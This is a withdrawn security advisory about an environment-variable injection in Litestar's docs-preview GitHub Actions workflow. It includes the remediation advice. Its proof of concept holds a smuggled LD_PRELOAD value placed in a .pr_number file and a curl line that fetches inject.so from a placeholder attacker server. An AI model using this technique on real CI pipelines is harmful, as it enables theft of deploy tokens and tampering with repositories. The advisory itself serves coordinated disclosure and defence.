CVE-2024-42370
Withdrawn Advisory: Litestar has an environment Variable injection in `docs-preview.yml` workflow
Description
## Withdrawn Advisory This advisory has been withdrawn because the confidentiality, integrity, and availability impacts of the vulnerability affect Litestar's CI/CD environment rather than the `litestar` package. While the information in the advisory is still valid, users of the `litestar` package are not affected and do not need to receive Dependabot alerts. ## Original Advisory ### Summary Litestar's `docs-preview.yml` workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation. ### Environment Variable injection (`GHSL-2024-177`) The [`docs-preview.yml` workflow](https://github.com/litestar-org/litestar/blob/ffaf5616b19f6f0f4128209c8b49dbcb41568aa2/.github/workflows/docs-preview.yml) gets triggered when the `Tests And Linting` workflow completes: ```yaml on: workflow_run: workflows: [Tests And Linting] types: [completed] ``` Later, it downloads and extracts an artifact generated by the triggering workflow: ```yaml - name: Download artifact uses: dawidd6/action-download-artifact@v6 with: workflow_conclusion: success run_id: ${{ github.event.workflow_run.id }} path: docs-preview name: docs-preview ``` And reads `docs-preview/.pr_number` into an Environment Variable: ```yaml - name: Set PR number run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV ``` The `$GITHUB_ENV` pointed file is just a regular file where every `KEY=VALUE` will be used to define a new Environment Variable after the step completes. Since the contents of the `.pr_number` file have not been validated, they may contain new lines that will cause new Environment Variables to be defined. An attacker can send a malicious `.pr_number` file with the following content: ```txt 111 LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so ``` Which will result in two Environment Variables being defined: - PR_NUMBER=111 - LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so In this example we are manipulating the `LD_PRELOAD` environment variable to force the system to load a malicious shared library called `inject.so`. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment. The following step will run the `JamesIves/github-pages-deploy-action` action which will [run the `node` command](https://github.com/JamesIves/github-pages-deploy-action/blob/2c9a889f39c2410b2ca1342f465a53a7c5c389b4/action.yml#L5). Therefore the `LD_PRELOAD` will execute arbitrary code when `node` gets executed: ```yaml - name: Deploy docs preview uses: JamesIves/github-pages-deploy-action@v4 with: folder: docs-preview/docs/_build/html token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }} repository-name: litestar-org/litestar-docs-preview clean: false target-folder: ${{ env.PR_NUMBER }} branch: gh-pages ``` #### PoC - Clone the repository - Edit the `ci.yml` workflow. ```yaml name: Tests And Linting on: pull_request: jobs: upload-patch: runs-on: ubuntu-latest timeout-minutes: 10 steps: - name: Save PR number and payload run: | make payload echo -e "${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so" > payload/.pr_number curl http://<ATTACKER SERVER>/inject.so -o payload/inject.so - name: Upload artifact uses: actions/upload-artifact@v3 with: name: docs-preview path: payload ``` - Create a Pull Request with this change. - Since the modified workflow is triggered on `pull_request`, the attacker Pull Request will trigger it and upon completion will trigger the vulnerable `Deploy documentation preview` workflow which will read the malicious artifact and pollute the Environment Variables. #### Impact This issue will grant a malicious actor the [following permissions](https://github.com/litestar-org/litestar/actions/runs/10081936962/job/27875077668#step:1:17): ``` Issues: write Metadata: read PullRequests: write ``` In addition, the following secret will get exposed to the attacker: `DOCS_PREVIEW_DEPLOY_TOKEN` #### Remediation - Verify the contents of the downloaded artifacts. - Do not allow new lines in the value redirected to GITHUB_ENV ### Resources - [CodeQL for JavaScript - Expression injection in Actions](https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection/) - [Keeping your GitHub Actions and workflows secure Part 2: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input/) - [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) ## Disclosure Policy This report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).